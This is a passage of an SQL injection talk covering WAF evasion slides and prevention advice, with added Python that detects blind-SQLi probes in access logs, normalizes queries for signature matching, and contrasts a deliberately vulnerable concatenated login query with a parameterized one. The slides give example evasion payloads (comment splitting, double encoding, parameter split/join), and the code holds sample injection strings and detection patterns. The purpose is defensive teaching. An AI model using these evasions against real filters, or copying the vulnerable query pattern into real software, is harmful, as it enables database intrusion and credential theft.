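Detection logic for the blind-injection probes of slides 11 through 13 and the oversized-request trick of slide 27, as an added example that is not part of the original talk. It reads Apache-style access-log lines (constructed for this example), percent-decodes the request target, flags boolean true/false pairs, DBMS fingerprint comparisons and delay functions, and marks any request at or beyond the 4097-character IIS truncation length quoted on slide 27 so the analyst knows the recorded line may be incomplete. Because POST bodies never reach an access log, the first evasion on that slide is only visible with request-body logging at the WAF or application layer.

```python
"""Flag blind-SQLi probes and log-truncation risk in web access logs.
Added example, not part of the talk. The log lines below are constructed."""
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# IIS truncation length quoted on slide 27; requests this long may be logged incomplete.
LOG_TRUNCATION_LIMIT = 4097

LOG_LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<bytes>\d+|-)$')
BOOLEAN_RE = re.compile(r"\b(and|or)\s+1\s*=\s*[12]\b")            # slide 11
FINGERPRINT_RE = re.compile(                                       # slide 12
    r"\b(getdate|now|sysdate)\(\)\s*=\s*(getdate|now|sysdate)\(\)")
TIMING_RE = re.compile(r"waitfor\s+delay|benchmark\s*\(|pg_sleep\s*\(")  # slide 13

# Constructed sample log: one client walking through the talk's probes,
# one normal visitor, and one padded request in the style of slide 27.
SAMPLE_LOG = (
    '10.0.0.5 - - [12/Jun/2012:10:00:01 -0400] "GET /posts.php?id=2 HTTP/1.1" 200 5120\n'
    '10.0.0.5 - - [12/Jun/2012:10:00:02 -0400] "GET /posts.php?id=2%20and%201=2 HTTP/1.1" 200 312\n'
    '10.0.0.5 - - [12/Jun/2012:10:00:03 -0400] "GET /posts.php?id=2%20and%201=1 HTTP/1.1" 200 5120\n'
    '10.0.0.5 - - [12/Jun/2012:10:00:04 -0400] "GET /posts.php?id=2%20and%20getdate()=getdate() HTTP/1.1" 200 5120\n'
    '10.0.0.5 - - [12/Jun/2012:10:00:05 -0400] "GET /posts.php?id=2;%20WAITFOR%20DELAY%20%270:0:10%27-- HTTP/1.1" 200 5120\n'
    '10.0.0.9 - - [12/Jun/2012:10:01:00 -0400] "GET /posts.php?id=3 HTTP/1.1" 200 4870\n'
    '10.0.0.7 - - [12/Jun/2012:10:02:00 -0400] "GET /posts.php?param=' + "a" * 4097
    + '&id=2%20or%201=1-- HTTP/1.1" 200 5120\n'
)


def analyze(log_text: str) -> list:
    """Return (ip, reason, decoded_target) for every suspicious request."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_LINE_RE.match(line)
        if not m:
            continue  # unparseable line; in production count these too
        target = m.group("target")
        decoded = unquote_plus(target).lower()
        if len(target) >= LOG_TRUNCATION_LIMIT:
            findings.append((m.group("ip"), "oversized-request", decoded[:60] + "..."))
        if TIMING_RE.search(decoded):
            findings.append((m.group("ip"), "time-based-probe", decoded))
        if FINGERPRINT_RE.search(decoded):
            findings.append((m.group("ip"), "dbms-fingerprint", decoded))
        if BOOLEAN_RE.search(decoded):
            findings.append((m.group("ip"), "boolean-probe", decoded))
    return findings


def differential_pairs(findings: list) -> list:
    """(ip, base request) pairs that sent both a true (1=1) and a false (1=2)
    variant of the same request: the differential-analysis signature of slide 11."""
    seen = defaultdict(set)
    for ip, reason, decoded in findings:
        if reason != "boolean-probe":
            continue
        base = re.sub(r"\s+(and|or)\s+1\s*=\s*[12]\b.*$", "", decoded)
        seen[(ip, base)].add(re.search(r"1\s*=\s*([12])", decoded).group(1) == "1")
    return sorted(key for key, values in seen.items() if values == {True, False})


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
    print("differential pairs:", differential_pairs(analyze(SAMPLE_LOG)))
```

A single `and 1=1` is weak evidence on its own; the true/false pair from one client against one base request, which `differential_pairs` isolates, is what distinguishes a probe from noise. The response sizes in the constructed lines (5120 versus 312 bytes) are the side channel the attacker reads, and are worth recording for the same reason.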
  • 28. WAF Evasion
        • Comments
            o # = single line comment
            o -- = single line comment
            o /* */ = inline, multi-line comment
            o /*! */ = MySQL-specific inline, multi-line comment
            Example: http://www.someforum.com/posts.php?id=2 UN/**/ION SEL/**/ECT * FROM…
        • New line
            o %0D%0A = URL-encoded newline
            o %0B = URL-encoded vertical tab
            Example: http://www.someforum.com/posts.php?id=2 UNION%0D%0ASELECT * FROM…
  • 29. WAF Evasion (cont.)
        • Character Encoding
            o Unicode (U+02BC = ʼ)
            o CHAR()
            o Hexadecimal
            o URL-encoding
            o Double Encoding
            Example: Double Encoding:
              URL    = http://www.someforum.com/posts.php?id=2 UN%252f%252a%252a%252fION SEL%252f%252a%252a%252fECT * FROM…
              WAF    = http://www.someforum.com/posts.php?id=2 UN%2f%2a%2a%2fION SEL%2f%2a%2a%2fECT * FROM…
              Result = http://www.someforum.com/posts.php?id=2 UN/**/ION SEL/**/ECT * FROM…
  • 30. WAF Evasion (cont.)
        • Concatenation
            o EXEC()
            o Split/Join
            o Special Characters (e.g. '*', '+', '%', etc.)
            Example: Split/Join:
              URL         = http://www.someforum.com/posts.php?id=SELECT name&id=password FROM users
              WAF         = id=SELECT name id=password FROM users
              ASP/ASP.Net = id=SELECT name,password FROM users
            Special Characters:
              URL         = http://www.someforum.com/posts.php?id=SEL%ECT name,password FR%OM users
              WAF         = id=SEL%ECT name,password FR%OM users
              ASP/ASP.Net = id=SELECT name,password FROM users
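The evasions on slides 28 through 30 all exploit a filter that matches signatures against a request in a form different from what the database finally executes. The following Python is an added example (not code from the talk or from any WAF vendor) of the normalization a filter has to do first: percent-decoding is repeated until the value stops changing so that double encoding (`%252f` to `%2f` to `/`) is undone, inline comments are stripped, encoded newlines and vertical tabs collapse to one space, and repeated query parameters are joined with a comma the way slide 30 says ASP/ASP.Net does (that platform behaviour is taken from the slide, not verified here). The decode-round cap is an assumption to keep hostile input from looping.

```python
"""Normalize a query string the way a WAF or detector must before matching
signatures. Added example, not the talk's or any vendor's code."""
import re
from urllib.parse import parse_qs, unquote

# Assumed bound on decode rounds: enough for double/triple encoding, no loops.
MAX_DECODE_ROUNDS = 5

_COMMENT_RE = re.compile(r"/\*!?.*?\*/", re.S)  # /* ... */ and MySQL /*! ... */ (slide 28)
_WS_RE = re.compile(r"\s+")                     # \s covers \r, \n and the vertical tab \x0b
_SIG_RE = re.compile(
    r"\bunion\s+select\b|\bselect\b.+\bfrom\b|\bor\s+1\s*=\s*1\b", re.I)


def fully_decode(value: str) -> str:
    """Percent-decode until a fixed point (bounded), defeating double encoding (slide 29)."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    return value


def normalize(value: str) -> str:
    """Decode, drop inline comments, collapse all whitespace, lower-case."""
    text = fully_decode(value)
    text = _COMMENT_RE.sub("", text)
    text = _WS_RE.sub(" ", text)
    return text.strip().lower()


def normalized_params(query_string: str) -> dict:
    """Parse a query string, joining repeated parameters with ',' (slide 30's
    split/join case, as the slide says ASP/ASP.Net does), then normalize each value.
    parse_qs already performs one decode round; normalize() performs the rest."""
    raw = parse_qs(query_string, keep_blank_values=True)
    return {name: normalize(",".join(values)) for name, values in raw.items()}


def is_suspicious(query_string: str) -> bool:
    """Signature match on the normalized form rather than the raw bytes."""
    return any(_SIG_RE.search(v) for v in normalized_params(query_string).values())


if __name__ == "__main__":
    # Constructed inputs mirroring the slides' examples (posts is an assumed table name).
    for qs in ("id=2",
               "id=2 UN/**/ION SEL/**/ECT * FROM posts",
               "id=2 UNION%0D%0ASELECT * FROM posts",
               "id=2 UN%252f%252a%252a%252fION SEL%252f%252a%252a%252fECT * FROM posts",
               "id=SELECT name&id=password FROM users"):
        print(is_suspicious(qs), normalized_params(qs))
```

The order matters: comments are removed only after decoding finishes, otherwise `%2f%2a%2a%2f` survives the comment pass and `UN/**/ION` reassembles later in the database. The same normalization belongs in application-side validation, since slide 29's point is that the WAF and the application can decode a different number of times.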
  • 33. SQLi Prevention
        • Sanitize User Input
            o Normalize Input
            o Whitelists
            o Built-in Functions
            o Regular Expressions
            o Trust NO data source (e.g. Cookies, Referer, User-Agent, etc.)
        • Prepared Statements/Parameterized Queries
        • Stored Procedures
        • Accounts with Least Privilege
        • Enable DisallowAdhocAccess registry setting for MS SQL Server
        • Perform Self Assessments
        • Use a Web Application Firewall
        • Filter Outbound Traffic at Firewall
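The concatenated query from slide 4 beside the parameterized form this slide recommends, plus an allow-list check for the numeric `id` parameter of slide 11, as an added example that is not taken from the talk. It runs against an in-memory SQLite database with two constructed user rows; SQLite is used only because it runs anywhere, and the assumption is that any driver with bind parameters (SQL Server, MySQL, Oracle) separates data from SQL text the same way.

```python
"""Concatenated query versus parameterized query, plus allow-list validation.
Added example, not code from the talk; uses SQLite purely for portability."""
import re
import sqlite3

# Constructed sample data.
ROWS = [("alice", "s3cret"), ("bob", "hunter2")]
# Allow-list for slide 11's posts.php?id=...: a plain positive integer, nothing else.
_POST_ID_RE = re.compile(r"[1-9][0-9]{0,9}")


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user TEXT, pwd TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", ROWS)
    return conn


def login_concat(conn: sqlite3.Connection, uname: str, pword: str) -> list:
    """Slide 4's vulnerable pattern: user input is spliced into the SQL text,
    so "' or 1=1--" rewrites the WHERE clause and comments out the password check."""
    sql = ("SELECT user FROM users WHERE user = '" + uname
           + "' AND pwd = '" + pword + "'")
    return [row[0] for row in conn.execute(sql)]


def login_param(conn: sqlite3.Connection, uname: str, pword: str) -> list:
    """Slide 33's fix: placeholders; the driver binds the input as a value,
    so the same payload is compared against the user column and matches nothing."""
    sql = "SELECT user FROM users WHERE user = ? AND pwd = ?"
    return [row[0] for row in conn.execute(sql, (uname, pword))]


def is_valid_post_id(raw: str) -> bool:
    """Allow-list (whitelist) check: reject anything that is not a bare integer
    before it gets anywhere near a query. '2 and 1=1' and '2 or 1=1--' fail here."""
    return _POST_ID_RE.fullmatch(raw) is not None


def parse_post_id(raw: str) -> int:
    if not is_valid_post_id(raw):
        raise ValueError("rejected post id: %r" % raw)
    return int(raw)


def run_demo() -> dict:
    """Exercise both login paths with a legitimate login and the slide-4 payload."""
    conn = make_db()
    payload = "' or 1=1--"
    return {
        "concat_valid": login_concat(conn, "alice", "s3cret"),
        "concat_injected": login_concat(conn, payload, "anything"),
        "param_valid": login_param(conn, "alice", "s3cret"),
        "param_injected": login_param(conn, payload, "anything"),
    }


if __name__ == "__main__":
    for name, result in run_demo().items():
        print(f"{name:16} -> {result}")
    for raw in ("2", "2 and 1=1", "2 or 1=1--"):
        print(f"id={raw!r:14} valid={is_valid_post_id(raw)}")
```

The injected call against `login_concat` returns every user because the predicate became `user = '' or 1=1`; against `login_param` it returns nothing because the whole payload is just a username that does not exist. Pair the parameterized query with a least-privilege account (the slide's next bullet) so that even a query which does get through has neither `xp_cmdshell` nor ad hoc remote access available to it.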
  • 34. Q&A